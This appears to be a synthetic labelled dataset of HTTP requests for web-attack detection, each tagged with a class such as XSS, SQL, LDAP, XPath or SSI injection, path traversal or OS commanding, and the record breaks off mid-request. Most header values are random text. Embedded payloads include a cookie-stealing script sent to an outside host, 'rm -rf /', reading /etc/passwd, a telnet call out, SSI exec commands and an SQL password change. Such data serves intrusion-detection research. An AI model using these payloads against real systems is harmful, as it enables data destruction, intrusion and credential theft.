Expires: Wed, 14 Jun 06 18:51:54 GMT
Last-Modified: Fri, 27 Feb 04 06:37:04 GMT
Host: www.i8ggeihcT.uk
Connection: keep-alive
Accept: image/gif, video/quicktime, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.9, deflate
Accept-Language: yix-hqlfobun, pcd-Kied4
Cache-Control: no-transform
Cookie: an=ti1cj;msBtl=gLnhtT'   or     count(  path/child::node()[position(    )=((   i  +    j   +    k +l +   1)]     |  path/child::*()[position()=(k+1)])=1    or 'aIse'    =    ' aieo'  or
Cookie2: $Version="0"
Date: Wed, 28 May 08 24:17:09 CET
Expect: 100-continue
If-Modified-Since: Fri, 13 Apr 07 03:34:35 GMT
If-Unmodified-Since: Sun, 11 Jun 06 10:56:17 UTC
If-Match: *
If-None-Match: "lMXecP37ESltcpqPvUKB"
If-Range: Tue, 16 Sep 08 21:35:33 UTC
Max-Forwards: 6
Pragma: no-cache
Authorization: oiet embilnno=cduhe
Referer: http://eunhc5r.com/0sgfo0Na/tst9/ajkr0rV9/rvn3no.tiff
Trailer: From
User-Agent: Mozilla/4.4 (Machintosh; U; Mac OS X 2.1; sz-Hh; rv:1.3.7) Gecko/92815197
UA-CPU: Sparc
UA-Disp: 9729,4869,32
Via: 7.4 73.162.34.188
Transfer-Encoding: gzip
Warning: 212 53.139.159.27 "triyogjsloIpo" "Sat, 11 Dec 04 17:13:36 UTC"
X-Serial-Number: 96934723

agei2ss9ynosr=08&laduftjj9=lharIoiTren&r6zDuR=po(e;i/

End - Id: 50109
Start - Id: 48010
class: XSS
GET /aYqY-Qhpi.k8uVH/nfsafr/dexOM6uf/hdxnEwgr/w5dNTbetweenM_cXtcVc/dN.4iEcWGRGuUgVJu/3UkoFpps.png?3nselaN4tTtyher=%3Clink+++rel+%3D++++%22+++stylesheet++%22++href++++%3D+%22++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.isveanra.com%2Fcgi-bin%2Fis.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E&igbnciunound=siall&tel=zrhten4c HTTP/1.0
Host: www.eerad.st
Connection: eInlYuit
Accept: */*
Accept-Charset: windows-1252;q=0.9
Accept-Encoding: *
Accept-Language: bdy-emw
Cache-Control: no-transform
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Thu, 01 Dec 05 04:20:52 GMT
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 19 Sep 08 05:30:21 UTC
If-Unmodified-Since: Mon, 12 Feb 07 03:20:26 UTC
If-Match: "zjXxMrbyh_n85Wan7"
If-None-Match: *
If-Range: "GfDk.aHG6n7hj0ZvNwLj"
Max-Forwards: 017
MIME-Version: 8.3
Pragma: 2ne0='sltYoe'
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: Basic dG9vdTpzSHRuZ2U=
Range: 545-32,248-,104203-4203
Referer: /oKd3/asoytnn/honntroa/etus.avi
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.1 (compatible; Konqueror/8.2; Win 9x; klifi7iad; ijaawy)
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: identity
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48010
Start - Id: 38806
class: LdapInjection
GET /gFpNSrKv/Hq9TI7-U/eKb8Z/uksoRAi/n1RdcG_A0ReDG.htm?eeeUprvnreue1=03%29%28%26%28objectClass%3DOyil%29%28%7C%28sn++%3D+ss%29%28cn%3Dwea+++J*%29%29 HTTP/1.0
Host: 167.123.53.221
Connection: close
Accept: image/*;q=0.9
Accept-Charset: shift_jis, x-mac-cyrillic, cp-950, windows-1254, windows-1252
Accept-Encoding: 
Accept-Language: h-sut0do;q=0.9, w7lapoeo-euwde;q=0.7, eoTlino3-rsea2ed, er-tdm
Cache-Control: no-cache
Client-ip: 103.147.207.153
Cookie: td2aoxOer=847
Cookie2: $Version="055"
Date: Tue, 31 Aug 04 06:09:40 UTC
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: yRoml@orAqOa.ch
If-Modified-Since: Sat, 19 Jun 04 18:01:03 UTC
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: *
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: *
Max-Forwards: 641
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 929605-5,-089,269-624
Referer: /fe8oy/NeoKt/6ruhn.php4
TE: trailers,deflate;q=0.4,deflate
Trailer: Accept-Language
User-Agent: wcniG (esM4FrEc@x; pAG46FH; bri5cDp1Z6)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 9.9 134.21.37.89, 7nr/4.1 www.aWsu5Ryu.jpeg, FTP/0.4 www.estts.png
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38806
Start - Id: 43000
class: OsCommanding
POST /znVO0l6LnnQc_rkrz8/ti7c5nJnWFv.pB6mdpVl/irteaeltey7ussse/enognllIa5rceedeenf/azn/csR5IlrNuprniaBtTmah/a-.dll? HTTP/1.1
Content-Length: 228
Content-Language: srttgp
Content-Encoding: deflate
Content-Location: http://www.2ibxcD.net/Ooiaee.txt
Content-MD5: T21lYWhzaWZlbmVlbnQ1RA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 27 Mar 06 05:26:41 GMT
Host: 17.218.83.116:0303
Connection: keep-alive
Accept: audio/x-wav;q=0.7
Accept-Charset: utf-8, utf-7;q=0.9, windows-1258, x-mac-chinesesimp, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: tayeiei-25sTu, g-tolsEo
Cache-Control: no-store
Client-ip: 7.119.147.200
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="366"
Date: Mon, 23 Oct 06 23:36:46 UTC
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
From: 1lieg@acatdI.ch
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-Unmodified-Since: Sun, 03 Sep 06 06:12:02 CET
If-None-Match: *
If-Range: Mon, 21 Aug 06 18:01:25 CET
Max-Forwards: 2
Pragma: I=e9
Referer: /fya7j/y4toirc/od0it/yrlurAs8.avi
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.1 (Windows; U; Win98 0.2; ct-eo; rv:6.1.6) Gecko/42719080
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Upgrade: aiuiar/7.4, iBr3df/9.5, iirowo/9.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

tesDoilQ=y12VLdOQ&meue=nl&mngroup byevalU8mGnmrP=8&vxabHhti6e=`rm    -rf  /   `&cswihee25oe=93010679&at0tad=E39ager2Eeanes3&jataAtbcarodlsS=1&9tvnxebatie=tgOreplacezsmA&esh7sue6a=3aQ2YNt2J0@X&hmt6nn=r9D&irrogfnr=25699134

End - Id: 43000
Start - Id: 43614
class: OsCommanding
PUT /oe8WMcr4t2.eXqJKQl3t.pl? HTTP/1.1
Content-Length: 232
Content-Language: eope
Content-Encoding: deflate
Content-Location: /t4posmg/esddi/95elfst/ecsyemen/3vteQ.jsp
Content-MD5: NmtuZWkzYW5maDlybnFwQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Jan 07 03:22:00 CET
Last-Modified: Mon, 16 Feb 04 15:43:57 CET
Host: www.goelmo.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: /../../../../../../../bin/cat  /etc/passwd |
Cache-Control: max-age=1
Client-ip: 112.171.189.97
Cookie: baexEtxaew0fnr=ia xcd;p2eooetsN=aA@OUUftVk;oo1eoti=796378291
Cookie2: $Version="5"
Date: Mon, 15 Mar 10 05:07:52 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: 8eurpf@iaiyaRpet.biz
If-Modified-Since: Thu, 26 Jul 07 12:13:58 UTC
If-Unmodified-Since: Sun, 05 Feb 06 14:54:34 CET
If-Match: "sGyF-_bKIPkXf1C"
If-None-Match: *
If-Range: Mon, 28 Sep 09 08:29:47 UTC
Max-Forwards: 6
MIME-Version: 4.4
Pragma: no-cache
Authorization: NTLM bWw2aGRzY1NhbGx1cDNvaWNhbmp0b21ubnNzaXJJZW9hbQ==
Range: 29587-,-5463,921-
Referer: /toabgm.exe
TE: chunked;q=0.6
User-Agent: Mozilla/4.6 (Windows; U; WinNT 8.0; co-tn; rv:4.3.2) Gecko/16447751
UA-CPU: x86
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: 5.4 www.ghtuiEee.jpeg
Transfer-Encoding: r2erw
Warning: 292 4.192.147.187 "jcnr63piu1ccgw" "Wed, 22 Feb 06 08:21:51 UTC"
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 1018067
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

tbit8e2e=3385&htGontTi=a8vk-&vUyH4RN0o8libh=s@.g4nBRTT&i8=a@r&fb2vumeohdr=z-zc.&4nm9oiH=871388958&qiahlptsiete=835680&nnOeoH58or=Oihi]&oatde=<d0i&Kh.0dGTcxU=nu9&enrd3aqtod8v=eyoDnr8t&lVmT8Cix=8165333&eiutordetnMno=Wretem9xHi

End - Id: 43614
Start - Id: 46396
class: PathTransversal
GET /aS6sKwgettvVuBj/kacnn.png?o2oltzNyotn=18128&iF7pkmdrttfuhn=31&cagol27tr=605383280&iw3taTotshtyast=97854&ooo=o%3A%2F.htaccess%7E HTTP/1.1
Host: 82.74.16.161:301
Connection: wtei
Accept: */*;q=0.2
Accept-Charset: big5;q=0.6, euc-cn;q=0.0, us-ascii;q=0.3
Accept-Encoding: gzip;q=0.5, identity;q=0.6, deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 156.163.255.16
Cookie: sliseeja7giaewa=Ted;95NVnL0NfV6=a;i4fgs9Som1pmya=edAn;nAhreskni=m5R7v;GcxD=c ;pIitSaU=nzrp
Cookie2: $Version="9"
Date: Wed, 05 May 10 07:44:31 UTC
ETag: W/"NmzUcd4Oc4.oiXZu9LS"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 22 Oct 07 12:50:18 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "RRP0poUXVovgCzsI"
If-Range: ".O49kysF44AplHO8z"
Max-Forwards: 667
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM bmF6emVQbWV1ZW1BT091Z2dpZW5KZWF5VGV3bm9iYXNoZQ==
Range: 0-,-1441,-234089
Referer: /tien/oacyhoet/nfm0ss6.jsp
TE: gzip,trailers,deflate;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 6.0; 14-mr; rv:5.7.6) Gecko/49149696
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 7.0 137.126.180.196, FTP/0.8 32.21.102.60, HTTP/6.5 86.109.106.145
Transfer-Encoding: t0ie; urjith=rLho
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 188.93.207.249
X-Serial-Number: 75398657
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46396
Start - Id: 43246
class: OsCommanding
GET /d0ca/4oFzeOrx5V/v5sti/rPANVxZk/lZmMnR92la-5GVk/RsDiOvkRWeERb/sooZ9t/Ets2eooTtz5nrueesiK.cfm?rusatduteneArk=%5C%22++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++++www.icieetristto.com+71180++++%3B&hepnolbsx2iyah=Tro%2Be&qZf5OJ4a=s&oeh=6 HTTP/1.0
Host: www.6zOsttnot.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: 7emSt-ttgRsIA, m-fieb3i, nt1de3-eonu, i-sh;q=0.7, dhenn-zepea;q=0.9
Cache-Control: only-if-cached
Client-ip: 92.41.242.45
Cookie: aLtcgj=l11Cm
Cookie2: $Version="89"
Date: Mon, 18 Jul 05 07:09:45 CET
ETag: "7nK7kY.63R7HpdUOR"
Expect: h6244tu
From: w5itei@2re1ofAi.st
If-Modified-Since: Tue, 04 Apr 06 06:05:41 CET
If-Unmodified-Since: Sun, 13 May 07 19:29:37 UTC
If-Match: "jJJQ8_zWsQ9.n85fq.e"
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: Thu, 27 Mar 08 03:45:14 CET
Max-Forwards: 136
MIME-Version: 9.7
Pragma: raoaa='aOAog'
Proxy-Authorization: nueie 15ao22=ur0o
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /asoaa.rar
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.9 (compatible; Konqueror/5.3; Windows NT; beuFeqcmhR)
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 0.7 148.130.175.140, 1.3 www.edmfmdot.tiff
Transfer-Encoding: OuaE; cplrc0sl=fdohc
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43246
Start - Id: 38337
class: LdapInjection
GET /osoniesuteieieaTtmm.aspx?Afneoe1rdTNm=%29%28++++%7C++%28++++cn%3D*o+++%27brien*%29%28mail+%3D*o+%27brien*+%29&9hb73f=64&rspontp8joii=tz0%5Cr%7E%3CatShedbgsoundn5s&weWteEr2sh=8dgwtwwnxaswxtoknu HTTP/1.0
Host: www.reppad.biz
Connection: ebnh76t
Accept: application/*;q=0.0, text/xml;q=0.7, video/quicktime;q=0.7
Accept-Charset: big5;q=0.9, iso-8859-8;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: mssifdn-anc, takapate-ta1t1l, ons5toan-a;q=0.8
Cache-Control: no-transform
Client-ip: 116.63.205.12
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="689"
Date: Sun, 23 Apr 06 15:29:34 CET
ETag: "WbPrN@xJVi3tQ@DS"
Expect: krvt=nsetrd;ejpTaih
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 13 Jun 09 05:20:33 CET
If-Unmodified-Since: Wed, 11 Mar 09 16:47:28 UTC
If-Match: *
If-None-Match: "EW-SDSWc9ivJO@zKJ@"
If-Range: *
Max-Forwards: 36
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: -159254,-412692
Referer: http://G6omt.cz/wsj5iu/ssames/oaznnpYo/67p2ec/tnds.aspx
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: xteEi (oxq5BCBs5)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6454x625
Via: iu0v4h/8.8 90.119.40.193, FTP/2.3 www.r3hi.htm:63446, 5.6 www.tsoece.js
Transfer-Encoding: identity
Upgrade: t6h/8.7, dvd/6.5, em9l/7.2
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38337
Start - Id: 48442
class: XPathInjection
GET /Gh6.IT/lHx5v3PF/NN-WJA/ouEseareeCep/Rf/hEtxxlX/6b/egulh75nvn7.php?mteeOcld=0&coe6I6n5i=feutn HTTP/1.1
Host: www.ra9sNe.ch:80
Connection: keep-alive
Accept: video/*, image/png;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.0, euc-tw;q=0.9, windows-1251
Accept-Encoding: gzip;q=0.9, deflate;q=0.5
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 254.222.197.199
Cookie: 4ZZXzv5lG_=t8mlydp'     or    path/child::node()[position()=N]   or    'eStae' =   ';ZESiWFWP=cess0dlf5TAl;wTaebrbh=13197150
Cookie2: $Version="3"
Date: Fri, 29 Feb 08 20:26:53 GMT
ETag: W/"kUSTulY8V6NZDpPR"
Expect: aehiyth=1ref;rnpuReyt=b5ljiw
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Sat, 18 Nov 06 20:09:43 GMT
If-Unmodified-Since: Thu, 18 Oct 07 22:48:24 CET
If-Match: ".D8xdomO_8a34dG"
If-None-Match: "O5gnFo1Uf2q2qw2P"
If-Range: Tue, 17 Jan 06 02:52:58 CET
Max-Forwards: 19
MIME-Version: 9.5
Pragma: ss=hodcd5sz
Proxy-Authorization: Basic cm5sdDhhbmQ6THJ6Tg==
Authorization: hafdi oeoscne=d4aarRh
Range: 91336-,-23681,1-84677
Referer: /Beo1/iiATr/tifnb.mdb
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: oeilryroeMi2rlef
UA-Disp: 1479,1332,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.7 35.114.200.178, 0.6 106.49.192.162
Transfer-Encoding: compress
Upgrade: rtA/0.8, npmdh/5.1, 5r7roS/2.4, caeup/3.2, cHutrk/0.5
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48442
Start - Id: 39521
class: SSI
GET /ahtpass3s4wAU0adminYD6/ethoasio/aitiESE/tsst/dOee5ee/6uEe/ejxneGe/TA3/xhTYRxtermA.dll?bqlhcarmat=okCb. HTTP/1.0
Host: www.kmroas3n.it
Connection: rnoh
Accept: text/*;q=0.6, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: di-vndwao1;q=0.6
Cache-Control: no-transform
Cookie: 1smnotlahi=window.opena4iH1;osEecr=<!-- #include virtual="/var/log/httpd/access.log"-->
Cookie2: $Version="170"
Date: Thu, 08 Apr 04 03:25:51 GMT
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
From: mrno@feyrot7.st
If-Modified-Since: Sat, 08 Aug 09 22:09:43 GMT
If-Unmodified-Since: Thu, 12 Apr 07 16:01:59 GMT
If-Match: "fOz-v1sbb03@t5VnL7"
If-None-Match: *
If-Range: Fri, 30 Dec 05 01:07:24 GMT
Max-Forwards: 5
MIME-Version: 8.9
Pragma: wfn='eF0'
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Range: 649-,-625813
Referer: http://www.ehTt.ch/nscrt.msf
TE: trailers,gzip
User-Agent: Mozilla/3.1 (compatible; Konqueror/3.4; Win 9x; o0shni)
Via: t1pe/5.4 169.249.13.54, uhngn/2.3 62.129.155.213:70166, 1.3 www.eb9a.html
Warning: 371 169.121.60.122 "odtnnnle4TbLdinltnP" "Fri, 09 Jan 09 20:17:43 GMT"
X-Forwarded-For: 81.239.118.138
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39521
Start - Id: 41437
class: SqlInjection
PUT /MiIS/ptGx_h@6-FzGqVJ.exe? HTTP/1.0
Content-Length: 270
Content-Language: recA
Content-Encoding: deflate
Content-Location: /aetas.swf
Content-MD5: TnZteWdtb2Fvc3p5czlneQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Mon, 19 May 08 08:51:37 GMT
Host: 17.4.196.99
Connection: 3abaencr
Accept: text/plain;q=0.4, video/*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.4, x-mac-hebrew;q=0.0, windows-1254;q=0.9, hz-gb-2312;q=0.7
Accept-Encoding: 
Accept-Language: atrteot-ai, a1-hGt;q=0.2, 6suntcb7-to
Cache-Control: max-stale=0
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="67"
Date: Wed, 05 Mar 08 14:53:19 CET
ETag: W/"VY5DZ71S9_MGkrI4yJ"
Expect: enoavte1=egee
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "LloD.XU2LvHenr7LKc"
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 8260
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM b3R1aG44RW51a05sdXQzdGV6Y3RlNGlmbHc0ZHJnZWE3c3RvZWw=
Authorization: Digest response="5fBFD8A94ABDA9Ec3fD7C95f5A3C4CE1"
Range: -86
Referer: /isoeD37/ezqTslfx.tar
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/8.0 (Windows; U; Win98 8.4; aj-dn; rv:7.3.7) Gecko/39922150
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8.9 24.50.34.127, HTTP/9.4 www.XAlLzhc.jpg
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

esgd=;alter    table     anas     set   password =  'hea' where    name =    'Icd0';&8er=on8ohbn4rbsMr&ha4dytnHefel=\a aruEteaoyjn&opus=imgR%t/afnautoexec 4&ddi=eUgD9pNPlN@&mnlmh8izehgyOA0=9&i4me6hvdi=c0y7mTE&doszoi5ao=to~j&$+tbl&noi2=ara

End - Id: 41437
Start - Id: 43591
class: OsCommanding
GET /u8h6IZtiH1C9adi3Obhh/sffrorrfhtmz5mf/ine1gpsbhatigoxf/U.JQXhkYGn/rxsyTstsehf7/t3vXlfo4juMM/lA8e3RdsystemopenqW/t1JR.OsGtMFC62-VN/perop/ohotattrouveoste/d7zUUBJxtp.exe?toCxx=2nphftseerr+h&ehih=88907&u9dtS=hNK.llx4&aaOdr=hdbia&deoar4g8=58324&81sebjewrsnATt=784&nlEhtlx9onhob=%5C%3B++++%5C%2Fbin%5C%2Fid%3B&nkt=89 HTTP/1.0
Host: 100.165.84.227
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: u='mqwx'
Client-ip: 128.51.142.118
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="21"
Date: Sun, 22 Jul 07 01:30:01 GMT
ETag: "Wr_8UDQVijKJUROKG"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 16 Nov 09 14:31:55 UTC
If-Unmodified-Since: Thu, 05 May 05 03:13:23 GMT
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Fri, 11 Nov 05 02:54:53 UTC
Max-Forwards: 998
MIME-Version: 6.7
Pragma: o='arb'
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest nonce
Range: 0756-,6170-,99043-471
Referer: http://olj1.be/ln3h8tn/na7totr.js
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (compatible; Konqueror/7.9; Solaris; lahcxPNl)
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
X-Forwarded-For: 142.88.116.166
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43591
Start - Id: 39940
class: SSI
PUT /dh/K.wJVEURFZ5Kl/etnahfmhdo/bsuTr/XdOP./Ixtajorlp0urs9ey/a4tshhkrttda/tgRrssCcedVWB/e8vP5B/from4/e532aWm@DOAl.exe? HTTP/1.1
Content-Length: 390
Content-Language: igqkteau,ypwWgl,nahg3edi
Content-Encoding: identity
Content-Location: http://www.06dtnci.com/g5llrqe/hidnj.asmx
Content-MD5: ZXZpY3daQXdmSndmZHVweA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Sep 09 12:45:07 UTC
Last-Modified: Fri, 04 Nov 05 03:07:56 CET
Host: 137.203.234.188:80
Connection: eretf
Accept: */*
Accept-Charset: euc-cn;q=0.6, x-mac-arabic;q=0.9, x-mac-icelandic;q=0.9
Accept-Encoding: 
Accept-Language: m-9uor2;q=0.0, e-rL, hga4fh0-Navt, peoi-lq8utti
Cache-Control: adoykihh='tciudc'
Cookie: Lae7i1pcs4Shib=rh8i;Hzvnltc=cmdehrb;EDselectq@qC8=t7cK
Date: Thu, 13 Jan 05 13:52:27 UTC
Expect: v2s1ahe
If-Modified-Since: Fri, 15 Feb 08 17:31:02 CET
If-Unmodified-Since: Tue, 08 Aug 06 04:06:02 CET
If-Match: *
If-None-Match: "tS-2A8RVCCqGDLabtH"
Max-Forwards: 537
MIME-Version: 0.5
Proxy-Authorization: NTLM MnQ0N3d2bnRjbTF3dGQzdEFha2l0bjlybHhocGxhaGVlbnRsbjhhclI=
Range: -66,-447474,046886-
Referer: http://rinni.it/nCedat/mtJi.fgf
TE: trailers
Trailer: From
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 5.7; so-mR; rv:2.2.0) Gecko/33416795
UA-Pixels: 3924x987
Via: 7.1 251.95.169.24, HTTP/1.7 254.249.237.24
Upgrade: AWutq/3.3, Ereghm/5.5, aashd/6.2, ypndU4/8.9, Egoa/7.9

rty@sEBopeneZ=6wi3rydywz7cocea&cneoauhntnihiI=group byh&GppkselStD=5621397&tt73rhs=iothtewe0buhi&pagbssigtf9i=56162&9G=<!-- #exec    cmd="/bin/ls   -l    /home/EbImoeh/ddci1g"   -->&heiolnot63ld= nscriptlttekm)cwxOm&inaryoeexec=hrssfcuyeaU;h&iclua=Rle> pssnsEa&ecaoebmcrhc=idhda9aA6n&nRtsmgor=yhwlhoiso&sibt0ferw=o|&9macg9R1i=|madminjoMLsa|=enincludeOq

End - Id: 39940
Start - Id: 47501
class: XSS
GET /s.ukmVWngZOu/tV4yYK-iz7o4.mspx?d5=%26%7B%5Balert++++%28%27sUzsah%27%29%3B%5D%7D%3B&pKGahttpZ=1 HTTP/1.0
Host: www.eIyL.cz
Connection: jldise4
Accept: application/postscript;q=0.7, application/x-tar;q=0.6, application/x-tar;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: G-3WmluoY;q=0.7, A-oRtijlc;q=0.3, fusi5dh-6hly;q=0.1
Cache-Control: max-stale
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="037"
Date: Fri, 05 Nov 04 03:38:02 GMT
ETag: W/"mH_4FRfD3DPEqxMbE"
